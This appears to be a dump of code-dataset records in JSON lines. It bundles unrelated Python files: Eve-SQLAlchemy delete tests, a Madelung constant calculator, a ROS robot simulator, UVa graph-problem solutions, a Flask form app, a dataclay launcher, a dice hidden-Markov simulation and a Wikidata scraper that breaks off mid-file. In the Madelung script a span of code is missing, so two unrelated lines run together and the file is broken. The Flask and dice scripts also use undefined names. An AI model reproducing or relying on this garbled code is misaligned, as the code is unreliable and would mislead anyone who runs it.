datetime.now()\n _db.session.add(fake_person)\n _db.session.commit()\n fake_person_id = fake_person._id\n fake_invoice = self.test_sql_tables.Invoices(number=4)\n fake_invoice.people_id = fake_person._id\n fake_invoice._created = datetime.now()\n fake_invoice._updated = datetime.now()\n _db.session.add(fake_invoice)\n _db.session.commit()\n\n # grab parent collection count; we will use this later to make sure we\n # didn't delete all the users in the database. We add one extra invoice\n # to make sure that the actual count will never be 1 (which would\n # invalidate the test)\n response, status = self.get('invoices')\n invoices = len(response[self.app.config['ITEMS']])\n\n # verify that the only document retrieved is referencing the correct\n # parent document\n response, status = self.get('users/%s/invoices' % fake_person_id)\n person_id = response[self.app.config['ITEMS']][1]['people']['_id']\n self.assertEqual(person_id, fake_person_id)\n\n # delete all documents at the sub-resource endpoint\n response, status = self.delete('users/%s/invoices' % fake_person_id)\n self.assert204(status)\n\n # verify that the no documents are left at the sub-resource endpoint\n response, status = self.get('users/%s/invoices' % fake_person_id)\n self.assertEqual(len(response['_items']), 0)\n\n # verify that other documents in the invoices collection have not been\n # deleted\n response, status = self.get('invoices')\n self.assertEqual(len(response['_items']), invoices - 2)\n\n def test_delete_subresource_item(self):\n _db = self.app.data.driver\n\n # create random person\n fake_person = self.test_sql_tables.People.\\\n from_tuple(self.random_people(1)[0])\n fake_person._created = datetime.now()\n fake_person._updated = datetime.now()\n _db.session.add(fake_person)\n _db.session.commit()\n fake_person_id = fake_person._id\n fake_invoice = self.test_sql_tables.Invoices(number=4)\n fake_invoice.people_id = fake_person._id\n fake_invoice._created = datetime.now()\n fake_invoice._updated = datetime.now()\n _db.session.add(fake_invoice)\n _db.session.commit()\n fake_invoice_id = fake_invoice._id\n\n # GET all invoices by new contact\n response, status = self.get('users/%s/invoices/%s' %\n (fake_person_id, fake_invoice_id))\n etag = response[ETAG]\n\n headers = [('If-Match', etag)]\n response, status = self.delete('users/%s/invoices/%s' %\n (fake_person_id, fake_invoice_id),\n headers=headers)\n self.assert204(status)\n\n def delete(self, url, headers=None):\n r = self.test_client.delete(url, headers=headers)\n return self.parse_response(r)\n\n\nclass TestDeleteEvents(TestBaseSQL):\n\n def test_on_pre_DELETE_for_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertFalse(devent.called[1] is None)\n\n def test_on_pre_DELETE_resource_for_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE_people += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_for_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_resource_for_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE_people += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_dynamic_filter(self):\n def filter_this(resource, request, lookup):\n lookup[\"_id\"] = self.unknown_item_id\n self.app.on_pre_DELETE += filter_this\n # Would normally delete the known document; will return 404 instead.\n r, s = self.parse_response(self.delete_item())\n self.assert404(s)\n\n def test_on_post_DELETE_for_item(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_resource_for_item(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE_people += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_for_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_resource_for_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE_people += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_delete_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_resource += devent\n self.delete_resource()\n self.assertEqual(('people',), devent.called)\n\n def test_on_delete_resource_people(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_resource_people += devent\n self.delete_resource()\n self.assertEqual(tuple(), devent.called)\n\n def test_on_deleted_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_resource += devent\n self.delete_resource()\n self.assertEqual(('people',), devent.called)\n\n def test_on_deleted_resource_people(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_resource_people += devent\n self.delete_resource()\n self.assertEqual(tuple(), devent.called)\n\n def test_on_delete_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_item += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertEqual(\n self.item_id, devent.called[1][self.app.config['ID_FIELD']])\n\n def test_on_delete_item_people(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_item_people += devent\n self.delete_item()\n self.assertEqual(\n self.item_id, devent.called[0][self.app.config['ID_FIELD']])\n\n def test_on_deleted_item(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_item += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertEqual(\n self.item_id, devent.called[1][self.app.config['ID_FIELD']])\n\n def test_on_deleted_item_people(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_item_people += devent\n self.delete_item()\n self.assertEqual(\n self.item_id, devent.called[0][self.app.config['ID_FIELD']])\n\n def delete_resource(self):\n self.test_client.delete(self.known_resource_url)\n\n def delete_item(self):\n return self.test_client.delete(\n self.item_id_url, headers=[('If-Match', self.item_etag)])\n\n def before_delete(self):\n db = self.connection.session\n return db.query(self.test_sql_tables.People).\\\n get(self.item_id) is not None\n\n def after_delete(self):\n return not self.before_delete()\n","sub_path":"eve_sqlalchemy/tests/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"148769815","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nbasisVectors = [[1.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,1.0]]\nminVectorComponent = 1.0\nmaxVectorComponent = 1.0\n\ndef getNIonsInRadius(radius,sieve):\n\tnIons = 0\n\tk = int (radius+1)\n\tfor index1 in range(-k,k+1):\n\t\tfor index2 in range(-k,k+1):\n\t\t\tfor index3 in range(-k,k+1):\n\t\t\t\tx,y,z = getCoordFromBasis(index1,index2,index3)\n\t\t\t\tif getDistanceFromOrigin(x,y,z)nIonsLast:\n\t\t\tnIonsInShell.append(nIonsCurr-nIonsLast)\n\t\t\tmadelungConstant = 0\n\t\t\tfor i in range (len(nIonsInShell)):\n\t\t\t\tmadelungConstant+=pow(-1,i+1)*nIonsInShell[i]/pow(i+1,0.5)\n\t\t\tx.append(nShell)\n\t\t\ty.append(madelungConstant)\n\t\t\tif printVal:\n\t\t\t\tprint ('Shell: {} Number of Ions: {} Radius: {} Madelung Constant: {}'.format(nShell,(nIonsCurr-nIonsLast),radius,madelungConstant))\n\t\t\tnShell+=1\n\t\t\tnIonsLast = nIonsCurr\n\t\t\tnIonsCurr = 0\n\n\treturn x,y\n\t\nif __name__ == \"__main__\":\n\tx,y = getMadelungConstants(20)\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tax.plot(x,y)\n\tplt.title('Madelung Constant as a Function of Number of Shells') \n\tplt.xlabel('Number of Shells')\n\tplt.ylabel('Madelung Constant')\n\tplt.show()\n","sub_path":"Week1Excercise_MadelungSeries.py","file_name":"Week1Excercise_MadelungSeries.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253849082","text":"#!/usr/bin/env python\n\nimport rospy\nimport json\nfrom numpy.random import randn \n\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom tf.transformations import quaternion_from_euler\n\nfrom humanoid_league_msgs.msg import Position2D\nfrom simulator.vision import Vision\n\n# The major concept needed to change is that the Robot does not cache the change of the pos of the ball, since the black board already cache the ball position. And in real time, it is the blackboard, or say the DSD to publish the positionInfo message\nclass Robot:\n def __init__(self, name):\n self._name = name\n\n # WARN the robot_pos stores the ground truth of the robot position\n self.robot_pos = Position2D()\n \n # no need to cache the subscriber\n rospy.Subscriber(\"/robots_pos\", String, self.rpos_callback)\n\n # but cache the publisher\n # publish the position with noise to topic /amcl_pose\n self.pos_pub = rospy.Publisher(\"/amcl_pose\", PoseWithCovarianceStamped, queue_size = 2)\n\n self.vision = Vision()\n\n def perform(self):\n self.vision.perform(self.robot_pos)\n self.pub_pose_with_noise()\n\n def pub_pose_with_noise(self):\n new_pos = PoseWithCovarianceStamped()\n # although I think it is important to fill all the blank in new_pos, but according to world_model_capsule, just fill \n # new_pos.header, \n # new_pos.pose.pose.x, \n # new_pos.pose.pose.y, \n # new_pos,pose.pose.orientation is ok\n new_pos.header.frame_id = \"map\"\n new_pos.header.stamp = rospy.Time.now()\n new_pos.pose.pose.position.x = self.add_random(self.robot_pos.pose.x)\n new_pos.pose.pose.position.y = self.add_random(self.robot_pos.pose.y)\n new_orient = quaternion_from_euler(0, 0, self.add_random(self.robot_pos.pose.theta))\n new_pos.pose.pose.orientation.x = new_orient[0]\n new_pos.pose.pose.orientation.y = new_orient[1]\n new_pos.pose.pose.orientation.z = new_orient[2]\n new_pos.pose.pose.orientation.w = new_orient[3]\n self.pos_pub(new_pos)\n \n def rpos_callback(self, inJson):\n inJson = inJson.data\n rpos_msg = json.loads(inJson)\n self.robot_pos.header.frame_id = rpos_msg['frame_id'].encode(\"utf-8\")\n secs = rpos_msg['stamp']['secs']\n nsecs = rpos_msg['stamp']['nsecs']\n self.robot_pos.header.stamp = rospy.Time(secs, nsecs)\n self.robot_pos.pose.x = rpos_msg[self._name]['x'] \n self.robot_pos.pose.y = rpos_msg[self._name]['y'] \n self.robot_pos.pose.theta = rpos_msg[self._name]['t'] \n self.robot_pos.confidence = rpos_msg[self._name]['c']\n rospy.loginfo(\"{} received x: {}, y: {}, theta{}\".format(self._name, rpos_msg[self._name]['x'], rpos_msg[self._name]['y'], rpos_msg[self._name]['t']))\n \n \"\"\"\n def bpos_callback(self, inJson):\n inJson = inJson.data\n bpos_msg = json.loads(inJson)\n self.ball_pos.header.frame_id = bpos_msg['frame_id'].encode(\"utf-8\")\n secs = bpos_msg['stamp']['secs']\n nsecs = bpos_msg['stamp']['nsecs']\n self.ball_pos.header.stamp = rospy.Time(secs, nsecs)\n self.ball_pos.ball_relative.x = bpos_msg['ball']['x'] \n self.ball_pos.ball_relative.y = bpos_msg['ball']['y'] \n self.ball_pos.confidence = bpos_msg['ball']['c'] \n \"\"\"\n\n def add_random(self, num):\n return num+float(randn(1))\n\ndef main():\n rospy.init_node('robot1')\n robot = Robot('robot1')\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n robot.perform()\n rate.sleep()\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/simulator/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113930622","text":"# https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=989\n# Using Prim together with DFS/BFS. Complexity: O(t * s * log(c)) + O(t * q * (s + c))\nimport queue\nINF = float('inf')\nclass Node:\n def __init__(self, id, dist):\n self.id = id\n self.dist = dist\n def __lt__(self, other):\n return self.dist <= other.dist\n \n\ndef prim(source): # O (s * log(c))\n pq = queue.PriorityQueue()\n pq.put(Node(source, 0))\n dist[source] = 0\n while not pq.empty():\n top = pq.get()\n u = top.id\n visited[u] = True\n for neighbor in graph[u]:\n v = neighbor.id\n w = neighbor.dist\n if not visited[v] and dist[v] > w:\n dist[v] = w\n pq.put(Node(v, w))\n path[v] = u\n # print(path)\n # print(dist)\n for p in range(len(path)):\n if path[p] != -1:\n mst[p].append(Node(path[p], dist[p]))\n mst[path[p]].append(Node(p, dist[p]))\n return mst\n\n\ndef dfs(start, target, mst): # O (s + c)\n visited = [False] * len(mst)\n dist = [-INF for i in range(len(mst))] \n stack = []\n visited[start] = True\n stack.append(Node(start, 0))\n while len(stack) > 0:\n top = stack.pop()\n u = top.id\n if u == target:\n return dist[u]\n for v in mst[u]:\n if visited[v.id] == False:\n visited[v.id] = True\n stack.append(v)\n dist[v.id] = max(dist[u], v.dist)\n if dist[target] == -INF:\n return \"no path\"\n return dist[target]\n \n \ncase_no = 1\n\nwhile True:\n c, s, q = map(int, input().split())\n if c == 0 and s == 0 and q == 0:\n break\n if case_no != 1:\n print()\n graph = [[] for i in range(c)]\n \n for i in range(s):\n c1, c2, d = map(int, input().split())\n graph[c1 - 1].append(Node(c2 - 1, d))\n graph[c2 - 1].append(Node(c1 - 1, d))\n \n queries = []\n for j in range(q):\n q1, q2 = map(int, input().split())\n queries.append((q1 - 1, q2 - 1))\n\n print(\"Case #{}\".format(case_no))\n case_no += 1\n\n mst = [[] for i in range(c)]\n dist = [INF for i in range(c)]\n visited = [False for i in range(c)]\n path = [-1 for i in range(c)]\n # sum(si * log(ci)) ~ O(s * log(c))\n for i in range(c):\n if path[i] == -1:\n prim(i)\n # O (q * (s + c))\n for q1, q2 in queries:\n result = dfs(q1, q2, mst)\n print(result)\n\n\n\n# Using dynamic programming. Complexity: O(t * q * s * log(c))\nimport queue\nINF = float('inf')\nclass Node:\n def __init__(self, id, dist):\n self.id = id\n self.dist = dist\n def __lt__(self, other):\n return self.dist <= other.dist\n\ndef dp(start, target):\n dist = [INF for i in range(c)]\n# visited = [False for i in range(c)]\n pq = queue.PriorityQueue()\n pq.put(Node(start, 0))\n dist[start] = 0\n while not pq.empty():\n top = pq.get()\n u = top.id\n# visited[u] = True\n for neighbor in graph[u]:\n v = neighbor.id\n w = neighbor.dist \n if max(w, dist[u]) < dist[v]:\n dist[v] = max(w, dist[u])\n pq.put(Node(v, w)) \n return dist[target]\n\n\ncase_no = 1\n# O(t * q * c * log(s))\nwhile True:\n c, s, q = map(int, input().split())\n if c == 0 and s == 0 and q == 0:\n break\n if case_no != 1:\n print()\n graph = [[] for i in range(c)]\n \n for i in range(s):\n c1, c2, d = map(int, input().split())\n graph[c1 - 1].append(Node(c2 - 1, d))\n graph[c2 - 1].append(Node(c1 - 1, d))\n \n queries = []\n # O(q * c * log(s))\n for j in range(q):\n q1, q2 = map(int, input().split())\n queries.append((q1 - 1, q2 - 1))\n\n print(\"Case #{}\".format(case_no))\n case_no += 1\n for q1, q2 in queries:\n result = dp(q1, q2)\n if result == INF:\n print(\"no path\")\n else:\n print(result)\n\n","sub_path":"UVa/audiophobia.py","file_name":"audiophobia.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"617854766","text":"from flask import Flask, render_template, redirect, request, session, flash\n\napp = Flask(__name__)\napp.secret_key = 'mysecretkey'\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/users', methods =['POST'])\ndef users():\n if len(request.form['first']):\n return redirect('/')\n\n else:\n flash(\"success\")\n\n\n\n return render_template(\"userform.html\", name = name, favlocation = favlocation, comment= comment)\napp.run(debug=True)\n","sub_path":"Python/Flask_fun/counter/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84303816","text":"\n\"\"\" Class description goes here. \"\"\"\n\n\"\"\"Entry point for standalone dataClay Execution Environment server.\n\nThe main can be called easily through a\n\n python -m dclay_server\n\"\"\"\n\nimport logging\n\n__author__ = 'Alex Barcelo '\n__copyright__ = '2015 Barcelona Supercomputing Center (BSC-CNS)'\n\nlogger = logging.getLogger(__name__)\n\n\n# We create a specific function that can be also run from importing the module (testing)\ndef run_main():\n # Current execution environment since they are initialized using environment variables and cannot be concurrently started in same host.\n from dataclay import initialize\n initialize()\n from dataclay.executionenv.server.ExecutionEnvironmentSrv import ExecutionEnvironmentSrv\n exec_env_srv = ExecutionEnvironmentSrv()\n exec_env_srv.start()\n\n \nif __name__ == \"__main__\":\n run_main()\n \n","sub_path":"src/dataclay/executionenv/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198851284","text":"from matplotlib import cm\nfrom matplotlib import pyplot as plt\nfrom itertools import cycle, islice\nimport pandas as pd\nimport math\nimport numpy as np\ncolor = cm.inferno_r(np.linspace(.4,.8, 30))\n# np.random.seed(100)\n\n# def createTables(K):\n# tables = np.array([list(range(1,K+1)),list(range(K+1,2*K+1))])\n# return tables\n#\ndef transitionMatrix(K):\n A = np.zeros((2,2))\n A[0,0] += 0.25\n A[0,1] += 0.75\n A[1,0] += 0.75\n A[1,1] += 0.25\n\n\n return A\n\ndef emissionMatrix(K):\n# fair_emissions = np.ones((K,6)) * 1/6\n# bias_emissions = np.zeros((K,6))\n# bias_emissions[:,4] = 0.3\n# bias_emissions[:,5] = 0.7\n# fullEm = np.concatenate([fair_emissions, bias_emissions], axis=0)\n emissions = np.zeros((2,6))\n emissions[0,:] = 1/6 # fair dice state\n emissions[1,:][4:6] = 0.5 # bias dice state\n# return fair_emissions , bias_emissions, fullEm\n# print(emissions)\n return emissions\n\ndef createObservationSeq(table_seq,K, P):\n fair = 0\n bias = 1\n outcomes = []\n for i in range(K):\n hidden = np.random.choice([True, False], p=[1-P, P])\n state = ''\n if not hidden:\n if table_seq[i] == fair:\n die = np.random.multinomial(1, [1/6.]*6)\n state = 'fair'\n elif table_seq[i] == bias:\n# die = np.random.multinomial(1, [0.5] + [0.5] + [0]*4)# .\n die = np.random.multinomial(1, [0.4] + [0.2] + [0.2] + [0.1] + [0.05]+[0.05])\n state='bias'\n die = np.where(die>0)[0][0] + 1 # select the outcome of a dice throw.\n outcomes.append((die,state)) # append to list of outcomes for a player\n else:\n # ZERO INDICATES A HIDDEN OUTCOME, since a die cannot have outcome = 0\n if table_seq[i] == fair:\n die = np.random.multinomial(1, [1/6.]*6)\n state = 'fair_hidden'\n elif table_seq[i] == bias:\n# die = np.random.multinomial(1, [0.5] + [0.5] + [0]*4)# .\n die = np.random.multinomial(1, [0.4] + [0.2] + [0.2] + [0.1] + [0.05]+ [0.05])\n state='bias_hidden'\n die = np.where(die>0)[0][0] + 1 # select the outcome of a dice throw.\n outcomes.append((die,state)) # append to list of outcomes for a player\n\n df = pd.DataFrame(outcomes)\n df.columns = ['outcome', 'die']\n return df\n\ndef simulateTableSeq(K):\n start_prob = 0.5\n table_seq = []\n t = np.random.choice(2,1, p=[start_prob , 1 - start_prob])[0] # chosing first table is random\n table_seq.append(t)\n for i in range(K-1):\n if t == 0:\n # then more proble to shift table group after each throw.\n t = np.random.choice(2,1, p=[0.25, 0.75])[0]\n elif t ==1:\n t = np.random.choice(2,1, p=[0.75, 0.25])[0]\n table_seq.append(t)\n return table_seq\n\ndef simulateDice(K,players,P, distr):\n player_observations = []\n df = pd.DataFrame([])\n for i in range(players):\n if distr == 'mix':\n table_seq_vec = simulateTableSeq(K) # mixed , fiar and biased\n elif distr == 'bias':\n table_seq_vec = [1]*K # all biased\n elif distr == 'fair':\n table_seq_vec = [0]*K # all fair\n df_outcomes = createObservationSeq(table_seq_vec,K, P)\n df_outcomes['player'] = [i+1]*len(df_outcomes)\n df = pd.concat([df, df_outcomes])\n# print(df)\n return df\n\ndef plotObs(df_obs,players, distr):\n\n my_colors = [(0.2,0.4,0.5), (0.75, 0.25, 0.55)]*2\n# distr = 'mix'\n fig, ax = plt.subplots()\n if distr == 'mix' or distr == 'bias':\n b = df_obs[df_obs['die']=='bias'].groupby('outcome')['die'].count()\n b.plot.bar( stacked=True, color=my_colors ,title=\n 'Distribution of outcomes, ('+ distr + ')', rot=0, ax = ax)\n ax.set_ylabel('Counts for each outcome on a dice (all players inlcuded)')\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, labels, loc='best')\n\n if distr == 'mix' or distr == 'fair':\n f = df_obs[df_obs['die']=='fair'].groupby('outcome')['die'].count()\n f.plot.bar( stacked=True, color=my_colors[::-1], title=\n 'Distribution of outcomes',rot=0, ax = ax)\n ax.set_ylabel('Counts for each outcome on a dice (all players included)')\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, ['bias','fair'], loc='best')\n plt.show()\n\ndef plotPlayerSum(obs,distr):\n o = obs.groupby('player')['outcome','die'].sum()\n# o = o.sort_values(by=['outcome'])\n fig, ax = plt.subplots()\n o= o.reset_index()\n# print(o)\n my_colors = [(x/10.0, x/20.0, 0.75) for x in range(len(o))] # <-- Quick\n o['outcome'].plot(kind='bar',stacked = True, color=my_colors,title=\n 'Total sum for each player, ' + distr + ' dice distribution', rot = 0)\n ax.set_ylabel('Sum')\n ax.set_xlabel('Player')\n plt.show()\n\ndef multiPlot(obs_f,obs_b): # plot distributions, all fair and all bias\n fig, ax = plt.subplots()\n obs = pd.concat([obs_f,obs_b])\n o = obs.groupby(['player','die'])['outcome'].sum()\n my_colors = 'mb'\n o.plot.bar( stacked = True, color=my_colors,title= \n 'Sum for each player when using different dice distributons', rot = 0, ax=ax)\n ax.set_ylabel(\"Sum\")\n# print(o)\n plt.show()\n\ndef plotter(obs, players):\n color = 'rbg'\n fig, axes = plt.subplots(1,players, figsize=(12,3))\n for p in range(1,players+1):\n o = obs[obs['player']==p]\n ax = o['outcome'].plot.bar( stacked = True, color = color[p-1], ax = axes[p-1])\n ax.set_ylabel(\"dice outcome\")\n ax.set_xlabel(\"table i for player n\")\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, labels, loc='best')\n# o['outcome'].hist( color = color[p-1], ax = axes[p-1])\n plt.show()\n\ndef plotSums(d):\n ax = d.plot(kind='bar')\n ax.set_xlabel('player')\n ax.set_ylabel('sum')\n plt.show()\n\n\ndef main():\n K=2000\n N=3\n P = 0.8\n players = N\n pi_vec = np.array([0.5, 0.5])\n plot_without_hidden_outcomes = True\n# fair_emissions , bias_emissions, fullEm = emissionMatrix(K)\n# em_mat = emissionMatrix(K)\n# A_mat = transitionMatrix(K)\n# a = np.dot(pi_vec , em_mat\n\n \n distr = ['mix','fair','bias']\n obs = simulateDice(K,players,P,distr[2])\n obs = obs.assign(player_sequence = lambda x: x.outcome)\n print(obs)\n # NOW WE ARE ALLOWED TO SE THE TOTAL SUM: BUT ONLY THE OBSERVED OUTCOMES. NOT THE HIDDEN OUTCOMES.\n if plot_without_hidden_outcomes == True:\n obs['outcome'][obs['die'] == 'fair_hidden'] = 0 # 0 represents a hidden outcome\n obs['outcome'][obs['die'] == 'bias_hidden'] = 0 # 0 represents a hidden outcome\n \n d = pd.DataFrame()\n# d['player'] = [i for i in range(1,N+1)]\n\n total_sums = []\n observed_sums = []\n sums = obs.groupby('player')['outcome'].sum()\n print('observed sums for each player')\n print(sums, '\\n')\n for player in range(1,N+1):\n p = obs[obs['player'] == player]\n print('player: ', player)\n print('Observed Sum: ', p.outcome.sum())\n print('Original Sum: ', p.player_sequence.sum())\n print('number of hidden: ', p[p['outcome']==0].count().outcome)\n print(p, '\\n')\n observed_sums.append(p.outcome.sum())\n total_sums.append(p.player_sequence.sum())\n d['observed_sum'] = observed_sums\n d['original_sum'] = total_sums\n print(d)\n \n\n############## PLOT ########################################3\n plotSums(d)\n plotObs(obs,players,distr[2])\n plotPlayerSum(obs, distr[2])\n plotter(obs,players)\n# # \n \n Sum = 4\n dices = 3\n P = [[0]*dices]*Sum\n print(P)\n# for i in range()\n\n############## PLOT SEVERAL DIFFERENT DICE DISTRIBUTIONS #########################\n\n# obs_b = simulateDice(K,players,P,distr[2])\n# obs_f = simulateDice(K,players,P,distr[1])\n# plotObs(obs_b,players,distr[2])\n# plotObs(obs_f,players,distr[1])\n \n multiPlot(obs_f, obs_b)\n\n################ DYNAMIC PROGRAMMING ###############\nmain()\n","sub_path":"new_sum_HMM.py","file_name":"new_sum_HMM.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"218529721","text":"#!/usr/bin/python3\nf=open(\"shape_stat.csv\",\"r\")\ncount=0\nword=\"alarm clock\"\nfor i in f.readlines():\n\tk=i.split(\",\")\n\t\n\tif k[0] None:\n with open(LOGGING_FILE, 'a') as f:\n f.write(input_string+'\\n')\n print(input_string)\n return None\n\n#@profile\ndef _print_all_gnome_shell_processes() -> None:\n ps_e_process = subprocess.Popen(\"top -b -n 1\", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n ps_e_stdout_string, _ = ps_e_process.communicate()\n stdout_lines = ps_e_stdout_string.decode(\"utf-8\").split('\\n')\n _logging_print(\"number of chrome processes {}\".format(len(list(filter(lambda line: 'chrome' in line, stdout_lines)))))\n _logging_print(stdout_lines[0])\n list(map(_logging_print, filter(lambda line: 'gnome-shell' in line, ps_e_stdout_string.decode(\"utf-8\").split('\\n'))))\n return None\n\n######################\n# Async IO Utilities #\n######################\n\nUNIQUE_BOGUS_RESULT_IDENTIFIER = (lambda x: x)\n\nEVENT_LOOP = asyncio.new_event_loop()\nasyncio.set_event_loop(EVENT_LOOP)\n\n#@profile\ndef _indefinitely_attempt_task_until_success(coroutine, coroutine_args):\n result = UNIQUE_BOGUS_RESULT_IDENTIFIER\n while result == UNIQUE_BOGUS_RESULT_IDENTIFIER:\n task = coroutine(*coroutine_args)\n from datetime import datetime; _logging_print(\"_indefinitely_attempt_task_until_success attempt start time {}\".format(datetime.now()))\n _logging_print(\"All shell processes 1\")\n _print_all_gnome_shell_processes()\n try:\n results = EVENT_LOOP.run_until_complete(asyncio.gather(task))\n if isinstance(results, list) and len(results) == 1:\n result = results[0]\n except Exception as err:\n _logging_print(\"err :: {}\".format(err))\n pass\n finally:\n _logging_print(\"All shell processes 2\")\n _print_all_gnome_shell_processes()\n pending_tasks = asyncio.Task.all_tasks()\n _logging_print(\"len(pending_tasks) {}\".format(len(pending_tasks)))\n for pending_task in pending_tasks:\n _logging_print(\"pending_task {}\".format(pending_task))\n _logging_print(\"All shell processes 3\")\n _print_all_gnome_shell_processes()\n if result == UNIQUE_BOGUS_RESULT_IDENTIFIER:\n warnings.warn(\"Attempting to execute {coroutine} on {coroutine_args} failed.\".format(coroutine=coroutine, coroutine_args=coroutine_args))\n time.sleep(1)\n return result\n\n##########################\n# Web Scraping Utilities #\n##########################\n\nasync def _launch_browser_page():\n browser = await pyppeteer.launch({'headless': False})\n page = await browser.newPage()\n return page\n\nBROWSER_PAGE = _indefinitely_attempt_task_until_success(_launch_browser_page, [])\n\n#############################\n# Wikidata Search Utilities #\n#############################\n\nWIKIDATA_SEARCH_URI_TEMPLATE = 'https://www.wikidata.org/w/index.php?sort=relevance&search={encoded_string}'\n\n#@profile\ndef _normalize_string_wrt_unicode(input_string: str) -> str:\n normalized_string = unicodedata.normalize('NFKD', input_string).encode('ascii', 'ignore').decode('utf-8')\n return normalized_string\n\nPUNUCTION_REMOVING_TRANSLATION_TABLE = str.maketrans('', '', string.punctuation)\n\n#@profile\ndef _normalize_string_for_wikidata_entity_label_comparison(input_string: str) -> str:\n normalized_string = input_string\n normalized_string = _normalize_string_wrt_unicode(normalized_string)\n normalized_string = normalized_string.lower()\n normalized_string = normalized_string.translate(PUNUCTION_REMOVING_TRANSLATION_TABLE)\n return normalized_string\n\n#@profile\nasync def _most_relevant_wikidata_entities_corresponding_to_string(input_string: str) -> str:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 1\")\n _print_all_gnome_shell_processes()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 1\")\n wikidata_entities_corresponding_to_string = []\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 1.1\")\n page = BROWSER_PAGE\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 2\")\n input_string_encoded = urllib.parse.quote(input_string)\n uri = WIKIDATA_SEARCH_URI_TEMPLATE.format(encoded_string=input_string_encoded)\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 2\")\n _print_all_gnome_shell_processes()\n try:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 3\")\n _logging_print(\"uri {}\".format(uri))\n try:\n await page.goto(uri)\n except Exception as err:\n _logging_print(\"page.goto(uri) err {}\".format(err))\n exit()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 3.5\")\n await page.waitForSelector('div#mw-content-text')\n search_results_div = await page.waitForSelector('div.searchresults')\n _logging_print(\"search_results_div {}\".format(search_results_div))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 4\")\n search_results_paragraph_elements = await search_results_div.querySelectorAll('p')\n _logging_print(\"len(search_results_paragraph_elements) {}\".format(len(search_results_paragraph_elements)))\n search_results_have_shown_up = None\n for paragraph_element in search_results_paragraph_elements:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 5\")\n paragraph_element_classname_string = await page.evaluate('(p) => p.className', paragraph_element)\n _logging_print(\"paragraph_element_classname_string {}\".format(paragraph_element_classname_string))\n paragraph_element_classnames = paragraph_element_classname_string.split(' ')\n _logging_print(\"paragraph_element_classnames {}\".format(paragraph_element_classnames))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 6\")\n for paragraph_element_classname in paragraph_element_classnames:\n if paragraph_element_classname == 'mw-search-nonefound':\n search_results_have_shown_up = False\n elif paragraph_element_classname == 'mw-search-pager-bottom':\n 